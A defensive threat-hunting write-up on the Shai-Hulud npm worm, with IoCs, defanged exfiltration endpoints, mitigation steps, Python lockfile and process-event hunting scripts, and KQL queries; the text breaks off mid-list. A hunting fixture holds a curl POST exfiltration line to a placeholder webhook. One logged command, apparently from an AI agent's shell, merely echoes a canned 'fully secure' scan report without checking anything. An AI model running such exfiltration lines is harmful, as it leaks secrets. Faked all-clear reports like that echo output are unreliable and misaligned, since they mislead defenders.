# Hunter-Case-06 - Shai-Hulud Worm NPM Package Supply Chain

## Shai-Hulud: The novel self-replicating worm infecting hundreds of NPM packages

## 1.) Information

<mark style="color:blue;">**Hunter Blue's**</mark> day starts every day with researching the cyber security news for new threat hunting tasks to execute on customer datalakes.

-> Interesting report from sysdig: <https://www.sysdig.com/blog/shai-hulud-the-novel-self-replicating-worm-infecting-hundreds-of-npm-packages>

> Once executed, this novel worm — dubbed Shai-Hulud — steals credentials, exfiltrates them, and attempts to find additional NPM packages in which to copy itself. The malicious code also attempts to leak data on GitHub by making private repositories public.

<mark style="color:$danger;">**You should investigate the initial Entry and Execution to search through the logs with these IoCs / IoAs to find the right artifacts for Threat Hunting.**</mark>

### 1.1) Information Links and Research

* <https://www.sygnia.co/threat-reports-and-advisories/npm-supply-chain-attack-september-2025/>
* <https://unit42.paloaltonetworks.com/npm-supply-chain-attack/>
* <https://www.mend.io/blog/npm-supply-chain-attack-infiltrates-popular-packages/>

**Compromised npm packages and versions (many more are affected)**

The following packages were confirmed to include malicious code on September 8, 2025. Only the versions listed below are known to be compromised.

**Color & Styling Utilities**

* `chalk@5.6.1` – Style and color terminal output (≈300M weekly downloads).
* `chalk-template@1.1.1` – Template literal support for chalk (≈3.9M weekly).
* `ansi-styles@6.2.2` – ANSI escape codes for colors and styles (≈371M weekly).
* `supports-color@10.2.1` – Detect terminal color support (≈287M weekly).
* `color-convert@3.1.1` – Convert between RGB, HSL, HEX (≈193M weekly).
* `color-string@2.1.1` – Parse CSS color strings (≈27M weekly).
* `color-name@2.0.1` – CSS color name to RGB mappings (≈191M weekly).
* `color@5.0.1` – General color conversion/manipulation.

**ANSI / Terminal String Handling**

* `ansi-regex@6.2.1` – Regex to match ANSI escape codes (≈243M weekly).
* `strip-ansi@7.1.1` – Remove ANSI codes from strings (≈261M weekly).
* `slice-ansi@7.1.1` – Slice strings safely with ANSI sequences (≈59M weekly).
* `wrap-ansi@9.0.1` – Wrap text with ANSI sequences preserved (≈197M weekly).
* `has-ansi@6.0.1` – Detect ANSI codes in strings (≈12M weekly).

**General Utilities**

* `simple-swizzle@0.2.3` – Normalize arguments into arrays (≈26M weekly).
* `is-arrayish@0.3.3` – Check if a value is array-like (≈73M weekly).
* `backslash@0.2.1` – Normalize Windows path backslashes (≈0.26M weekly).
* `error-ex@1.3.3` – Create error objects with custom properties.

**Debugging & Logging**

* `debug@4.4.2` – Namespace-based logging utility (≈357M weekly).
* `supports-hyperlinks@4.1.1` – Detect terminal hyperlink support (≈19M weekly).

**Experimental / Miscellaneous**

* `proto-tinker-wc@0.1.87` – Prototype Web Components for testing.
* `@duckdb/node-api@1.3.3`, `@duckdb/node-bindings@1.3.3`, `duckdb@1.3.3`, `@duckdb/duckdb-wasm@1.29.2` – Database components.
* `prebid.js@10.9.2`, `prebid-universal-creative`, `prebid@latest` – Ad tech libraries.

**Attacker-Controlled Cryptocurrency Wallets**

Ethereum (ETH)

* `0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976` (primary)
* `0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024`
* `0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B`

Bitcoin (BTC)

* `1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx`
* `bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm`

Solana

* `5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6`

**Function Selectors Targeted (Ethereum)**

* `0x095ea7b3` – approve()
* `0xa9059cbb` – transfer()
* `0x23b872dd` – transferFrom()
* `0xd505accf` – permit()

**Malware Code Characteristics**

* Hooks into `fetch()`, `XMLHttpRequest`, and `window.ethereum.request`.
* Environment checks for browser objects (`typeof window !== 'undefined'`).
* Levenshtein algorithm for wallet address substitution.
* Hidden control object: `window.stealthProxyControl`.

**Phishing Infrastructure**

* Domain: `npmjs[.]help`
* IP: `185.7.81.108`
* Email: `support[at]npmjs[dot]help`
* Malicious CDN: `static-mw-host.b-cdn[.]net`, `img-data-backup.b-cdn[.]net`
* Remote host: `websocket-api2.publicvm[.]com`
* Example phishing URL (defanged): `https://www.npmjs[.]help/settings/qix/tfa/manageTfa?action=setup-totp`

## 2.) Indicators of Compromise

### Indicators of compromise <a href="#cimhunting-202509npmpackagessupplychainattack-indicatorsofcompromise" id="cimhunting-202509npmpackagessupplychainattack-indicatorsofcompromise"></a>

| Type                 | Value                                                              | Notes / usage                                                                                                                                                      |
| -------------------- | ------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| SHA256               | `46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09` | Malicious `bundle.js` listed in report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/)                                                    |
| SHA256               | `b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777` | IOC from report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/)                                                                           |
| SHA256               | `dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c` | IOC from report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/)                                                                           |
| SHA256               | `4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db` | IOC from report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/)                                                                           |
| URL (webhook)        | `https://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7`      | C2 / exfil endpoint used by the malware. Use `webhook.site` (dot replaced) when searching. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| Filename / Workflow  | `shai-hulud-workflow.yml`                                          | Malicious YAML workflow filename called out. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/)                                               |
| GitHub repo name     | `Shai-Hulud`                                                       | Malware creates public repo named `Shai-Hulud` to publish exfiltrated secrets. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/)             |
| Tool abuse indicator | `trufflehog`                                                       | Legit tool abused by actors for secrets discovery — hunt for usage. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/)                        |

* Tool: trufflehog execution

<figure><img src="/files/faAchq69PvdvkbTNWpEL" alt=""><figcaption></figcaption></figure>

* Defender XDR Hunting

<figure><img src="/files/udW9VK4NuBzDk994gI6f" alt=""><figcaption></figcaption></figure>

* Other SOC Customer Case where Defender already flagged the malicious npm packages

<figure><img src="/files/sfDQQc1LRrzOEb3HGOHy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/2thS8u4BttJINPNVMb2l" alt=""><figcaption></figcaption></figure>

### 2.1) Executions from Threat Actor - Steps

* The worm executes during the post-install phase of the compromised NPM packages, running a huge `bundle.js` script.
* The code targets Linux and macOS machines, performing multiple operations in parallel to spread itself in the NPM package registry and to steal sensitive information such as credentials.
* Shai-Hulud conducts local system discovery.
* It searches for sensitive details on the machine, including GitHub and NPM credentials, as well as credentials for AWS and GCP.
* It spreads itself and compromises other ecosystems.
* The worm uses the GitHub user and their credentials (`ghp_*` and `gho_*` tokens), iterating over the repositories belonging to the user.
* It gains persistence and steals the associated secrets via a malicious GitHub Action that is invoked on a "push" event.
* To receive the credentials, the site `webhook[.]site` is used.
* The trufflehog binary is downloaded and used to search for other sensitive credentials in the filesystem.
* Shai-Hulud also contains code that looks for AWS and GCP credentials, searching both locally in the file system and any Instance Metadata Service (IMDS) endpoints.
* The malicious JavaScript checks again whether the GitHub user is authenticated. If so, it creates a new GitHub repository named "Shai-Hulud", where the previously found credentials are uploaded in a base64-encoded JSON file.

### 2.2) Indicators of Compromise - Executions <a href="#h-indicators-of-compromise" id="h-indicators-of-compromise"></a>

```
#IOCs
ProcessCommandLine
sh -c "node bundle.js"

InitiatingProcessCommandLine
node /Users/<USERNAME>/.nvm/versions/node/v20.14.0/bin/npm install

# trufflehog made executable (tool used to search for API keys, credentials and tokens)
ProcessCommandLine
chmod +x /Users/<USERNAME>/Workspaces/ivf/platform/frontend/apps/client-ivf/node_modules/@nativescript-community/ui-pulltorefresh/trufflehog

# trufflehog extraction
ProcessCommandLine
tar -xzf /Users/<USERNAME>/Workspaces/ivf/platform/frontend/apps/client-ivf/node_modules/@nativescript-community/ui-pulltorefresh/trufflehog_3.90.6_darwin_arm64.tar.gz -C /Users/<USERNAME>/Workspaces/ivf/platform/frontend/apps/client-ivf/node_modules/@nativescript-community/ui-pulltorefresh trufflehog

# Other cases
Filepath
/home/devops-agent-1/.npm/_cacache/content-v2/sha512/34/b8/00d4fe26f80010b9a7ad0ca97cf7d8709cf41df1c1745e37c85ffcdd3206bf92079a9d1167d0c3f6fc76ccc4f60d7897242a207fd4ce032e96f55d259cbc
```

npm (through the underlying cacache library) stores downloaded package content in a content-addressable cache under `~/.npm/_cacache/content-v2/sha512/<first2>/<next2>/<rest-of-hash>`: the three path segments joined together are the hex sha512 digest of the stored blob, so the `34/b8/...` prefix is just sharding of the hash, as in the example path above. The file itself typically contains the compressed package tarball (or a data blob) as fetched from the registry (registry.npmjs.org, GitHub, or mirrors).
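To turn a cache path like the one above into something you can grep a lockfile for, here is an added Python example (not code from this page, npm or cacache) that converts a content-v2 path into the SRI `integrity` value that package-lock.json records, does the inverse for hunting in file events, and matches the result against a lockfile. The path layout follows cacache's documented scheme; the fake tarball bytes, the sample lockfile and the `/home/dev` directory are constructed for the example.

```python
import base64
import hashlib
import re

# cacache (the cache library behind npm) lays content out as
#   <cache>/_cacache/content-v2/<algorithm>/<hex[0:2]>/<hex[2:4]>/<hex[4:]>
# so the three trailing segments joined together are the hex digest of the stored blob.
CACACHE_RE = re.compile(
    r"_cacache/content-v2/(?P<algo>sha512|sha256|sha1)/"
    r"(?P<a>[0-9a-f]{2})/(?P<b>[0-9a-f]{2})/(?P<rest>[0-9a-f]+)/?$"
)
HEX_LEN = {"sha1": 40, "sha256": 64, "sha512": 128}

# Path as it appeared in the case above (copied from this page).
OBSERVED_PATH = (
    "/home/devops-agent-1/.npm/_cacache/content-v2/sha512/34/b8/"
    "00d4fe26f80010b9a7ad0ca97cf7d8709cf41df1c1745e37c85ffcdd3206bf92079a9d1167d0c3f6fc76ccc4f60d7897242a207fd4ce032e96f55d259cbc"
)


def cacache_path_to_integrity(path):
    """Map a content-v2 path to the SRI string ('sha512-<base64>') that package-lock.json records."""
    m = CACACHE_RE.search(path)
    if not m:
        return None
    hex_digest = m["a"] + m["b"] + m["rest"]
    if len(hex_digest) != HEX_LEN[m["algo"]]:  # truncated or mangled path
        return None
    b64 = base64.b64encode(bytes.fromhex(hex_digest)).decode("ascii")
    return f"{m['algo']}-{b64}"


def integrity_to_cacache_relpath(integrity):
    """Inverse mapping: SRI string -> path relative to the npm cache directory, for file-event hunting."""
    algo, b64 = integrity.split("-", 1)
    hex_digest = base64.b64decode(b64).hex()
    return f"_cacache/content-v2/{algo}/{hex_digest[:2]}/{hex_digest[2:4]}/{hex_digest[4:]}"


def lockfile_matches(lock, integrity):
    """'path@version' entries of a lockfileVersion 2/3 package-lock whose integrity equals the given SRI."""
    return [
        f"{path}@{meta.get('version')}"
        for path, meta in lock.get("packages", {}).items()
        if meta.get("integrity") == integrity
    ]


# Constructed sample: fake tarball bytes whose sha512 we compute ourselves, so the round trip is checkable.
FAKE_TARBALL = b"constructed tarball bytes, not a real package"
FAKE_INTEGRITY = "sha512-" + base64.b64encode(hashlib.sha512(FAKE_TARBALL).digest()).decode("ascii")
SAMPLE_LOCK = {  # constructed package-lock.json (lockfileVersion 3) fragment
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "app", "version": "1.0.0"},
        "node_modules/example-pkg": {"version": "1.2.3", "integrity": FAKE_INTEGRITY},
        "node_modules/other-pkg": {"version": "0.0.1", "integrity": "sha512-AAAA"},
    },
}

if __name__ == "__main__":
    print(cacache_path_to_integrity(OBSERVED_PATH))            # SRI to grep for in lockfiles
    relpath = integrity_to_cacache_relpath(FAKE_INTEGRITY)     # path to grep for in file events
    print(relpath)
    print(lockfile_matches(SAMPLE_LOCK, cacache_path_to_integrity("/home/dev/.npm/" + relpath)))
```

The useful direction in an investigation is usually the second one: take the `integrity` values of the compromised versions from a known-bad lockfile, derive the cache paths, and search file-creation telemetry for them, which catches hosts that downloaded the package even if the install itself was not logged.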


## 3.) Initial Access

* The worm executes during the post-install phase of the compromised NPM packages, running a huge **bundle.js** script.


## 4.) Finding through Threat Hunting

* We hunted through the datalake logs of the whole infrastructure and, yes, you guessed it right: we found a malicious execution not related to legitimate admin tasks, which was also confirmed by the system owner (macOS user), so we saved the "life" of this company.

<figure><img src="/files/WVlgS4ZfDBoELdkZYdGo" alt=""><figcaption></figcaption></figure>

## 5.) Mitigation

**Strengthen Supply Chain Controls**

* Pin dependencies to verified versions and use `npm ci` instead of `npm install` to enforce lockfile consistency. While this strengthens supply chain integrity, it adds complexity for developers (slower iteration, lockfile conflicts, harder testing of new versions). Whether to enforce strict reproducibility should be decided based on each team's risk appetite and operational needs.
* Conduct security awareness training for developers to identify phishing and credential harvesting attempts. Include this case study to demonstrate the risk.
* Integrate automated dependency scanning tools (e.g., Snyk, Semgrep, Mend.io, Socket.dev) into CI/CD pipelines to flag malicious or anomalous packages early.
* Mirror critical open-source packages in private registries and vet updates before internal distribution.

**Rebuild and Redeploy**

* Recompile and redeploy all applications that previously included compromised dependencies to remove malicious code from runtime environments.
* For web applications, publish clean client-side builds immediately to eliminate malware exposure for new sessions.

**Remove and Replace Malicious Packages**

* Uninstall compromised versions immediately and upgrade to patched releases (e.g., `chalk@5.6.2` or later).
* If a patch is not out yet, roll back to the last known good version before the incident (e.g., downgrade `ansi-regex@6.2.1` to `6.0.0`) and lock your dependency there.
* Perform a clean reinstall:
  * Delete the `node_modules` directory.
  * Clear the npm cache.
  * Regenerate lockfiles to ensure all code is sourced from trusted versions.

**Host and User**

* Reset all passwords.
* Clear the npm cache.
* Remove `node_modules`.
* Generate a new `package-lock.json`.
* Rotate all tokens.
* Restage the host.

**Secure Secrets and Tokens**

Assume that secrets may have been exfiltrated from build or runtime environments where compromised packages were present.

* Rotate all private keys, API tokens, and credentials used in affected CI/CD pipelines and applications.

**Audit Dependencies**

* Inventory all applications, services, and build pipelines for use of affected package versions.
* Use lockfiles (`package-lock.json`, `yarn.lock`) or a Software Composition Analysis (SCA) tool to pinpoint instances of vulnerable packages.
* Use a read-only dependency scanner to identify compromised package versions listed in this advisory. For example, the [Open Tools Vulnerable Packages Scanner](https://github.com/knostic/open-tools/tree/main/vulnerable_packages_scanner) supports npm, yarn, pnpm, and bun lockfiles, generates a JSON report, and can be integrated into CI pipelines to fail builds when a match is detected.
* Begin with a scan-only or dry-run mode. Once confirmed, replace affected packages, regenerate lockfiles, and redeploy updated applications.
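As an added example (neither this page's own tooling nor the scanner linked above), a small read-only Python audit that walks a `package-lock.json` and reports every installed copy, including nested ones that a top-level `npm ls` can hide, whose name@version is on the list in section 1.1. It handles both lockfileVersion 1 (nested `dependencies` tree) and lockfileVersion 2/3 (flat `packages` map keyed by install path). The two sample lockfiles are constructed; the package list is the page's own.

```python
import json
import sys

# name -> set of compromised versions, taken from the package list in section 1.1 of this page
# (entries without a pinned version, such as prebid-universal-creative, are left out).
COMPROMISED = {
    "chalk": {"5.6.1"}, "chalk-template": {"1.1.1"}, "ansi-styles": {"6.2.2"},
    "supports-color": {"10.2.1"}, "color-convert": {"3.1.1"}, "color-string": {"2.1.1"},
    "color-name": {"2.0.1"}, "color": {"5.0.1"}, "ansi-regex": {"6.2.1"}, "strip-ansi": {"7.1.1"},
    "slice-ansi": {"7.1.1"}, "wrap-ansi": {"9.0.1"}, "has-ansi": {"6.0.1"},
    "simple-swizzle": {"0.2.3"}, "is-arrayish": {"0.3.3"}, "backslash": {"0.2.1"},
    "error-ex": {"1.3.3"}, "debug": {"4.4.2"}, "supports-hyperlinks": {"4.1.1"},
    "proto-tinker-wc": {"0.1.87"}, "@duckdb/node-api": {"1.3.3"}, "@duckdb/node-bindings": {"1.3.3"},
    "duckdb": {"1.3.3"}, "@duckdb/duckdb-wasm": {"1.29.2"}, "prebid.js": {"10.9.2"},
}


def _walk_v1(deps):
    # lockfileVersion 1: a tree of {"name": {"version": ..., "dependencies": {...}}}
    for name, meta in deps.items():
        if "version" in meta:
            yield name, meta["version"]
        yield from _walk_v1(meta.get("dependencies", {}))


def iter_lock_entries(lock):
    """Yield (package name, installed version) for every package recorded in the lockfile."""
    if "packages" in lock:  # lockfileVersion 2/3: keyed by install path
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself
                continue
            name = path.rsplit("node_modules/", 1)[-1]  # keeps the @scope/ prefix
            if "version" in meta:  # workspace links carry no version
                yield name, meta["version"]
    else:  # lockfileVersion 1
        yield from _walk_v1(lock.get("dependencies", {}))


def audit_lockfile(lock_json):
    """Sorted, de-duplicated name@version pairs in the lockfile that are on the compromised list."""
    lock = json.loads(lock_json)
    return sorted({f"{n}@{v}" for n, v in iter_lock_entries(lock) if v in COMPROMISED.get(n, ())})


# Constructed sample lockfiles for the example (not real projects).
SAMPLE_LOCK_V3 = json.dumps({
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app", "version": "1.0.0"},
        "node_modules/chalk": {"version": "5.6.2"},                        # patched, fine
        "node_modules/some-cli": {"version": "2.0.0"},
        "node_modules/some-cli/node_modules/chalk": {"version": "5.6.1"},  # nested bad copy
        "node_modules/ansi-regex": {"version": "6.2.1"},
        "node_modules/@scope/safe": {"version": "1.0.0"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "name": "legacy-app", "lockfileVersion": 1,
    "dependencies": {
        "example-server": {"version": "1.0.0", "dependencies": {"debug": {"version": "4.4.2"}}},
        "debug": {"version": "4.3.7"},
    },
})

if __name__ == "__main__":
    # usage: python audit_lock.py package-lock.json   (falls back to the constructed samples)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            print(audit_lockfile(fh.read()))
    else:
        print(audit_lockfile(SAMPLE_LOCK_V3), audit_lockfile(SAMPLE_LOCK_V1))
```

Run it against every lockfile in the inventory before touching anything (it only reads), then do the clean reinstall described above and run it again on the regenerated lockfile to confirm the result is empty.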

## 6.) Detection and Hunting

### 6.1) Sigma Rules

```
will follow
```

### 6.2) Linux Commandline Hunting

```
# ProcessCommandLine captured during the hunt, as logged (the echoed report strings are in German)
/bin/bash -c -l 'source /home/tux/.user/shell-snapshots/snapshot-bash-snapshot.sh && eval 'echo "========================================" && echo "🔒 VOLLSTÄNDIGER SICHERHEITSBERICHT 🔒" && echo "========================================" && echo "" && echo "✅ SYSTEM VOLLSTÄNDIG SICHER!" && echo "" && echo "ALLE 19 KOMPROMITTIERTEN PAKETE ÜBERPRÜFT:" && echo "" && echo "✅ ansi-regex@6.2.1 - NICHT GEFUNDEN" && echo "✅ ansi-styles@6.2.2 - NICHT GEFUNDEN" && echo "✅ backslash@0.2.1 - NICHT GEFUNDEN" && echo "✅ chalk@5.6.1 - NICHT GEFUNDEN" && echo "✅ chalk-template@1.1.1 - NICHT GEFUNDEN" && echo "✅ color@5.0.1 - NICHT GEFUNDEN" && echo "✅ color-convert@3.1.1 - NICHT GEFUNDEN" && echo "✅ color-name@2.0.1 - NICHT GEFUNDEN" && echo "✅ color-string@2.1.1 - NICHT GEFUNDEN" && echo "✅ debug@4.4.2 - NICHT GEFUNDEN" && echo "✅ error-ex@1.3.3 - NICHT GEFUNDEN" && echo "✅ has-ansi@6.0.1 - NICHT GEFUNDEN" && echo "✅ is-arrayish@0.3.3 - NICHT GEFUNDEN" && echo "✅ simple-swizzle@0.2.3 - NICHT GEFUNDEN" && echo "✅ slice-ansi@7.1.1 - NICHT GEFUNDEN" && echo "✅ strip-ansi@7.1.1 - NICHT GEFUNDEN" && echo "✅ supports-color@10.2.1 - NICHT GEFUNDEN" && echo "✅ supports-hyperlinks@4.1.1 - NICHT GEFUNDEN" && echo "✅ wrap-ansi@9.0.1 - NICHT GEFUNDEN" && echo "" && echo "🛡️ SCHUTZSTATUS: VOLLSTÄNDIG GESCHÜTZT" && echo "🔍 MALWARE SCAN: SAUBER" && echo "📦 SICHERE VERSIONEN: INSTALLIERT" && echo "" && echo "========================================"' \< /dev/null && pwd -P >| /tmp/output'


```
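As an added example (not hunting content from this page and not a vendor rule), here is a Python script that applies the process-chain indicators from sections 2.1 and 2.2 (`npm install` spawning `sh -c "node bundle.js"`, trufflehog being unpacked and made executable under `node_modules`, contact with webhook.site, the `shai-hulud-workflow.yml` file) to exported JSON-lines process events with Defender-style field names, and scores each device. The events, hosts, users and paths are constructed, and the rule weights are assumed values.

```python
import json
import re

# Constructed JSON-lines process events using Defender-style field names; hosts, users and paths
# are made up. The first four mirror the chain in sections 2.1/2.2, the last two are benign noise.
SAMPLE_EVENTS = r"""
{"Timestamp":"2025-09-16T08:12:01Z","DeviceName":"dev-mac-01","ProcessCommandLine":"sh -c \"node bundle.js\"","InitiatingProcessCommandLine":"node /Users/alice/.nvm/versions/node/v20.14.0/bin/npm install"}
{"Timestamp":"2025-09-16T08:12:03Z","DeviceName":"dev-mac-01","ProcessCommandLine":"tar -xzf /Users/alice/proj/node_modules/@example/pkg/trufflehog_3.90.6_darwin_arm64.tar.gz -C /Users/alice/proj/node_modules/@example/pkg trufflehog","InitiatingProcessCommandLine":"node bundle.js"}
{"Timestamp":"2025-09-16T08:12:04Z","DeviceName":"dev-mac-01","ProcessCommandLine":"chmod +x /Users/alice/proj/node_modules/@example/pkg/trufflehog","InitiatingProcessCommandLine":"node bundle.js"}
{"Timestamp":"2025-09-16T08:12:09Z","DeviceName":"dev-mac-01","ProcessCommandLine":"curl -s -X POST https://webhook.site/00000000-0000-0000-0000-000000000000","InitiatingProcessCommandLine":"node bundle.js"}
{"Timestamp":"2025-09-16T09:00:00Z","DeviceName":"build-01","ProcessCommandLine":"sh -c \"node bundle.js\"","InitiatingProcessCommandLine":"/bin/bash ./scripts/build.sh"}
{"Timestamp":"2025-09-16T09:01:00Z","DeviceName":"build-01","ProcessCommandLine":"sh -c \"jest --ci\"","InitiatingProcessCommandLine":"npm test"}
"""

BUNDLE_RE = re.compile(r"\bnode\s+bundle\.js\b")
NPM_INSTALL_RE = re.compile(r"\bnpm\s+(?:install|i|ci)\b")


def _trufflehog_staged(cmd, _parent):
    # tar/chmod touching a trufflehog binary inside node_modules (section 2.2)
    low = cmd.lower()
    return "trufflehog" in low and "node_modules" in low and low.startswith(("chmod ", "tar "))


# (rule name, weight, predicate(ProcessCommandLine, InitiatingProcessCommandLine)); weights are assumed.
RULES = [
    ("postinstall_bundle_js", 3, lambda c, p: bool(BUNDLE_RE.search(c) and NPM_INSTALL_RE.search(p))),
    ("trufflehog_in_node_modules", 3, _trufflehog_staged),
    ("webhook_site_contact", 2, lambda c, _p: "webhook.site" in c.lower()),
    ("shai_hulud_workflow_file", 3, lambda c, _p: "shai-hulud-workflow.yml" in c.lower()),
    ("bundle_js_other_parent", 1, lambda c, p: bool(BUNDLE_RE.search(c) and not NPM_INSTALL_RE.search(p))),
]
WEIGHTS = {name: w for name, w, _ in RULES}


def classify(event):
    """Names of the rules one event trips (empty list for benign events)."""
    cmd = event.get("ProcessCommandLine") or ""
    parent = event.get("InitiatingProcessCommandLine") or ""
    return [name for name, _w, pred in RULES if pred(cmd, parent)]


def hunt(jsonl):
    """Per device: distinct rules hit and their summed weight, only for devices with at least one hit."""
    per_device = {}
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = classify(event)
        if not hits:
            continue
        dev = per_device.setdefault(event.get("DeviceName", "unknown"), {"score": 0, "hits": []})
        for h in hits:
            if h not in dev["hits"]:
                dev["hits"].append(h)
                dev["score"] += WEIGHTS[h]
    return per_device


if __name__ == "__main__":
    for device, summary in sorted(hunt(SAMPLE_EVENTS).items(), key=lambda kv: -kv[1]["score"]):
        print(device, summary)
```

Feed it an export of `DeviceProcessEvents` (or the equivalent from another EDR) as JSON lines. The weak `bundle_js_other_parent` rule exists so that a `bundle.js` run not started by npm still surfaces for review instead of being dropped; a device that trips several of the heavier rules in one short window, as `dev-mac-01` does here, is the pattern the case above describes.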

### 6.3) Hunting Queries Microsoft Defender XDR

```kusto
// HUNT01 - VER1 - Compromised packages (CommonSecurityLog: proxy/firewall URL logs)
CommonSecurityLog
| where DestinationHostName == "registry.npmjs.org"
// | where RequestURL has_any ("backslash","chalk-template","supports-hyperlinks","has-ansi","simple-swizzle","color-string","error-ex","color-name","is-arrayish","slice-ansi","color-convert","wrap-ansi","ansi-regex","supports-color","strip-ansi","chalk","debug","ansi-styles", "proto-tinker-wc")
| where RequestURL has_all ("backslash", "0.2.1") or
   RequestURL has_all ("chalk-template", "1.1.1") or
   RequestURL has_all ("supports-hyperlinks", "4.1.1") or
   RequestURL has_all ("has-ansi", "6.0.1") or
   RequestURL has_all ("simple-swizzle", "0.2.3") or
   RequestURL has_all ("color-string", "2.1.1") or
   RequestURL has_all ("error-ex", "1.3.3") or
   RequestURL has_all ("color-name", "2.0.1") or
   RequestURL has_all ("is-arrayish", "0.3.3") or
   RequestURL has_all ("slice-ansi", "7.1.1") or
   RequestURL has_all ("color-convert", "3.1.1") or
   RequestURL has_all ("wrap-ansi", "9.0.1") or
   RequestURL has_all ("ansi-regex", "6.2.1") or
   RequestURL has_all ("supports-color", "10.2.1") or
   RequestURL has_all ("strip-ansi", "7.1.1") or
   RequestURL has_all ("chalk", "5.6.1") or
   RequestURL has_all ("debug", "4.4.2") or
   RequestURL has_all ("ansi-styles", "6.2.2") or
   RequestURL has_all ("proto-tinker-wc", "0.1.87")
| project-reorder TimeGenerated, SourceUserName, RequestURL





```

HUNT02 was contributed by Timo Sarkar, thanks ;)

```kusto
// HUNT02 - VER2 - Compromised packages (DeviceProcessEvents: package name@version on the command line)
// Hunt for recently compromised npm packages: https://www.ox.security/blog/npm-packages-compromised/ & https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again
DeviceProcessEvents
| where ProcessCommandLine has_any (
    "@ahmedhfarag/ngx-perfect-scrollbar@20.0.20",
    "@ahmedhfarag/ngx-virtual-scroller@4.0.4",
    "@art-ws/common@2.0.28",
    "@art-ws/config-eslint@2.0.4",
    "@art-ws/config-eslint@2.0.5",
    "@art-ws/config-ts@2.0.7",
    "@art-ws/config-ts@2.0.8",
    "@art-ws/db-context@2.0.24",
    "@art-ws/di@2.0.28",
    "@art-ws/di@2.0.32",
    "@art-ws/di-node@2.0.13",
    "@art-ws/eslint@1.0.5",
    "@art-ws/eslint@1.0.6",
    "@art-ws/fastify-http-server@2.0.24",
    "@art-ws/fastify-http-server@2.0.27",
    "@art-ws/http-server@2.0.21",
    "@art-ws/http-server@2.0.25",
    "@art-ws/openapi@0.1.9",
    "@art-ws/openapi@0.1.12",
    "@art-ws/package-base@1.0.5",
    "@art-ws/package-base@1.0.6",
    "@art-ws/prettier@1.0.5",
    "@art-ws/prettier@1.0.6",
    "@art-ws/slf@2.0.15",
    "@art-ws/slf@2.0.22",
    "@art-ws/ssl-info@1.0.9",
    "@art-ws/ssl-info@1.0.10",
    "@art-ws/web-app@1.0.3",
    "@art-ws/web-app@1.0.4",
    "@crowdstrike/commitlint@8.1.1",
    "@crowdstrike/commitlint@8.1.2",
    "@crowdstrike/falcon-shoelace@0.4.1",
    "@crowdstrike/falcon-shoelace@0.4.2",
    "@crowdstrike/foundry-js@0.19.1",
    "@crowdstrike/foundry-js@0.19.2",
    "@crowdstrike/glide-core@0.34.2",
    "@crowdstrike/glide-core@0.34.3",
    "@crowdstrike/logscale-dashboard@1.205.1",
    "@crowdstrike/logscale-dashboard@1.205.2",
    "@crowdstrike/logscale-file-editor@1.205.1",
    "@crowdstrike/logscale-file-editor@1.205.2",
    "@crowdstrike/logscale-parser-edit@1.205.1",
    "@crowdstrike/logscale-parser-edit@1.205.2",
    "@crowdstrike/logscale-search@1.205.1",
    "@crowdstrike/logscale-search@1.205.2",
    "@crowdstrike/tailwind-toucan-base@5.0.1",
    "@crowdstrike/tailwind-toucan-base@5.0.2",
    "@ctrl/deluge@7.2.1",
    "@ctrl/deluge@7.2.2",
    "@ctrl/golang-template@1.4.2",
    "@ctrl/golang-template@1.4.3",
    "@ctrl/magnet-link@4.0.3",
    "@ctrl/magnet-link@4.0.4",
    "@ctrl/ngx-codemirror@7.0.1",
    "@ctrl/ngx-codemirror@7.0.2",
    "@ctrl/ngx-csv@6.0.1",
    "@ctrl/ngx-csv@6.0.2",
    "@ctrl/ngx-emoji-mart@9.2.1",
    "@ctrl/ngx-emoji-mart@9.2.2",
    "@ctrl/ngx-rightclick@4.0.1",
    "@ctrl/ngx-rightclick@4.0.2",
    "@ctrl/qbittorrent@9.7.1",
    "@ctrl/qbittorrent@9.7.2",
    "@ctrl/react-adsense@2.0.1",
    "@ctrl/react-adsense@2.0.2",
    "@ctrl/shared-torrent@6.3.1",
    "@ctrl/shared-torrent@6.3.2",
    "@ctrl/tinycolor@4.1.1",
    "@ctrl/tinycolor@4.1.2",
    "@ctrl/torrent-file@4.1.1",
    "@ctrl/torrent-file@4.1.2",
    "@ctrl/transmission@7.3.1",
    "@ctrl/ts-base32@4.0.1",
    "@ctrl/ts-base32@4.0.2",
    "@hestjs/core@0.2.1",
    "@hestjs/cqrs@0.1.6",
    "@hestjs/demo@0.1.2",
    "@hestjs/eslint-config@0.1.2",
    "@hestjs/logger@0.1.6",
    "@hestjs/scalar@0.1.7",
    "@hestjs/validation@0.1.6",
    "@nativescript-community/arraybuffers@1.1.6",
    "@nativescript-community/arraybuffers@1.1.7",
    "@nativescript-community/arraybuffers@1.1.8",
    "@nativescript-community/gesturehandler@2.0.35",
